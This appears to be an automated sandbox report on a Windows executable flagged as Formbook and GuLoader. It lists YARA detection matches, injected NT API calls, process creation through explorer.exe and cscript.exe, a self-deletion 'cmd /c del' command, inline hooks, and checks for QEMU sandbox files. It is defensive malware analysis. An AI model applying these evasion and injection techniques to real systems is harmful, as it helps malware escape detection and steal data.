Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: hi38VYWujz.exe PID: 7828, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 6_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

6_2_00403350

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_00404C3F	6_2_00404C3F
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0680	11_2_36AF0680
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAF6F6	11_2_36BAF6F6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEC6E0	11_2_36AEC6E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B636EC	11_2_36B636EC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAA6C0	11_2_36BAA6C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8D62C	11_2_36B8D62C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0C600	11_2_36B0C600
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B14670	11_2_36B14670
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9D646	11_2_36B9D646
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF2760	11_2_36AF2760
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFA760	11_2_36AFA760
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA6757	11_2_36BA6757
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B5D480	11_2_36B5D480
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0445	11_2_36AF0445
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAF5C9	11_2_36BAF5C9
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA75C6	11_2_36BA75C6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADD2EC	11_2_36ADD2EC
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA124C	11_2_36BA124C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE1380	11_2_36AE1380
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAF330	11_2_36BAF330
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFE310	11_2_36AFE310
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE00A0	11_2_36AE00A0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B2508C	11_2_36B2508C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA70F1	11_2_36BA70F1
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFB0D0	11_2_36AFB0D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0B1E0	11_2_36B0B1E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF51C0	11_2_36AF51C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8D130	11_2_36B8D130
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BB010E	11_2_36BB010E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36ADF113	11_2_36ADF113
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B3717A	11_2_36B3717A
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA0EAD	11_2_36BA0EAD
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF1EB2	11_2_36AF1EB2
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE2EE8	11_2_36AE2EE8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA9ED2	11_2_36BA9ED2
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B90E6D	11_2_36B90E6D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B10E50	11_2_36B10E50
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B32E48	11_2_36B32E48
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAEFBF	11_2_36BAEFBF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF6FE0	11_2_36AF6FE0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA1FC6	11_2_36BA1FC6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFCF00	11_2_36AFCF00
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAFF63	11_2_36BAFF63
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B89C98	11_2_36B89C98
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0FCE0	11_2_36B0FCE0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B77CE8	11_2_36B77CE8
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B08CDF	11_2_36B08CDF
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AFAC20	11_2_36AFAC20
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE0C12	11_2_36AE0C12
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF3C60	11_2_36AF3C60
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA6C69	11_2_36BA6C69
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAEC60	11_2_36BAEC60
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B9EC4C	11_2_36B9EC4C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B02DB0	11_2_36B02DB0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B8FDF4	11_2_36B8FDF4
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF9DD0	11_2_36AF9DD0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAFD27	11_2_36BAFD27
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEAD00	11_2_36AEAD00
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0D69	11_2_36AF0D69
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA7D4C	11_2_36BA7D4C
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAFA89	11_2_36BAFA89
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BACA13	11_2_36BACA13
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAEA5B	11_2_36BAEA5B
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B64BC0	11_2_36B64BC0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAFB2E	11_2_36BAFB2E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B2DB19	11_2_36B2DB19
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF0B10	11_2_36AF0B10
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B06882	11_2_36B06882
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA78F3	11_2_36BA78F3
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BA18DA	11_2_36BA18DA
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF28C0	11_2_36AF28C0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B90835	11_2_36B90835
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B1E810	11_2_36B1E810
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF3800	11_2_36AF3800
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B0B870	11_2_36B0B870
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AD6868	11_2_36AD6868
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B65870	11_2_36B65870
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAF872	11_2_36BAF872
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AF9870	11_2_36AF9870
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AEE9A0	11_2_36AEE9A0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36BAE9A6	11_2_36BAE9A6
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B359C0	11_2_36B359C0

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: String function: 36B25050 appears 34 times
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: String function: 36B5E692 appears 86 times
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: String function: 36ADB910 appears 244 times
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: String function: 36B37BE4 appears 95 times
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: String function: 36B6EF10 appears 104 times

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22EB0 NtProtectVirtualMemory,LdrInitializeThunk,	11_2_36B22EB0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22ED0 NtResumeThread,LdrInitializeThunk,	11_2_36B22ED0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22E50 NtCreateSection,LdrInitializeThunk,	11_2_36B22E50
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22F00 NtCreateFile,LdrInitializeThunk,	11_2_36B22F00
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22CF0 NtDelayExecution,LdrInitializeThunk,	11_2_36B22CF0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22C30 NtMapViewOfSection,LdrInitializeThunk,	11_2_36B22C30
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22C50 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_36B22C50
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22DA0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_36B22DA0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_36B22DC0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22D10 NtQuerySystemInformation,LdrInitializeThunk,	11_2_36B22D10
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22A80 NtClose,LdrInitializeThunk,	11_2_36B22A80
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22B90 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_36B22B90
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22BC0 NtQueryInformationToken,LdrInitializeThunk,	11_2_36B22BC0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22B10 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_36B22B10
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B229F0 NtReadFile,LdrInitializeThunk,	11_2_36B229F0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B234E0 NtCreateMutant,	11_2_36B234E0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B24570 NtSuspendThread,	11_2_36B24570
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B24260 NtSetContextThread,	11_2_36B24260
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22E80 NtCreateProcessEx,	11_2_36B22E80
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22EC0 NtQuerySection,	11_2_36B22EC0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22E00 NtQueueApcThread,	11_2_36B22E00
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22FB0 NtSetValueKey,	11_2_36B22FB0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22F30 NtOpenDirectoryObject,	11_2_36B22F30
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B23C90 NtOpenThread,	11_2_36B23C90
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22CD0 NtEnumerateKey,	11_2_36B22CD0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B23C30 NtOpenProcessToken,	11_2_36B23C30
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22C20 NtSetInformationFile,	11_2_36B22C20
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22C10 NtOpenProcess,	11_2_36B22C10
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22D50 NtWriteVirtualMemory,	11_2_36B22D50
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22AA0 NtQueryInformationFile,	11_2_36B22AA0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22AC0 NtEnumerateValueKey,	11_2_36B22AC0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22A10 NtWriteFile,	11_2_36B22A10
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22B80 NtCreateKey,	11_2_36B22B80
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22BE0 NtQueryVirtualMemory,	11_2_36B22BE0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22B20 NtQueryInformationProcess,	11_2_36B22B20
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B22B00 NtQueryValueKey,	11_2_36B22B00
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B238D0 NtGetContextThread,	11_2_36B238D0
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36B229D0 NtWaitForSingleObject,	11_2_36B229D0

Source: hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs hi38VYWujz.exe
Source: hi38VYWujz.exe, 0000000B.00000003.45076039412.000000003687D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs hi38VYWujz.exe
Source: hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036D80000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs hi38VYWujz.exe
Source: hi38VYWujz.exe, 0000000B.00000003.45163393069.000000000693F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs hi38VYWujz.exe
Source: hi38VYWujz.exe, 0000000B.00000003.45080936588.0000000036A35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs hi38VYWujz.exe
Source: hi38VYWujz.exe, 0000000B.00000002.45164816357.00000000000D0000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs hi38VYWujz.exe
Source: hi38VYWujz.exe, 0000000B.00000003.45162607030.000000000691D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs hi38VYWujz.exe

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: hi38VYWujz.exe

Static PE information: invalid certificate

Source: hi38VYWujz.exe	Virustotal: Detection: 57%
Source: hi38VYWujz.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\hi38VYWujz.exe

File read: C:\Users\user\Desktop\hi38VYWujz.exe

Jump to behavior

Source: hi38VYWujz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hi38VYWujz.exe C:\Users\user\Desktop\hi38VYWujz.exe
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Process created: C:\Users\user\Desktop\hi38VYWujz.exe C:\Users\user\Desktop\hi38VYWujz.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hi38VYWujz.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Process created: C:\Users\user\Desktop\hi38VYWujz.exe C:\Users\user\Desktop\hi38VYWujz.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hi38VYWujz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe

6_2_00403350

Source: C:\Users\user\Desktop\hi38VYWujz.exe

File created: C:\Users\user\AppData\Local\Temp\nswBFC0.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/5@20/14

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 6_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

6_2_004020FE

Source: C:\Users\user\Desktop\hi38VYWujz.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 6_2_004046C3 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

6_2_004046C3

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:304:WilStaging_02

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crc32

Jump to behavior

Source: hi38VYWujz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cscript.pdbUGP source: hi38VYWujz.exe, 0000000B.00000003.45163393069.000000000693F000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45164816357.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45162607030.000000000691D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45080936588.0000000036908000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45076039412.000000003675A000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: hi38VYWujz.exe, hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45080936588.0000000036908000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45076039412.000000003675A000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: cscript.pdb source: hi38VYWujz.exe, 0000000B.00000003.45163393069.000000000693F000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45164816357.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45162607030.000000000691D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.45136338191.000000000637B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_10002DE0 push eax; ret		6_2_10002E0E
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 11_2_36AE08CD push ecx; mov dword ptr [esp], ecx		11_2_36AE08D6

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 6_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

6_2_10001B18

Source: C:\Users\user\Desktop\hi38VYWujz.exe

File created: C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE5

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\hi38VYWujz.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\hi38VYWujz.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hi38VYWujz.exe, 00000006.00000002.45135278512.0000000000908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEAMRCP
Source: hi38VYWujz.exe, 00000006.00000002.45232046783.0000000007F30000.00000004.00001000.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45264868800.00000000068A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
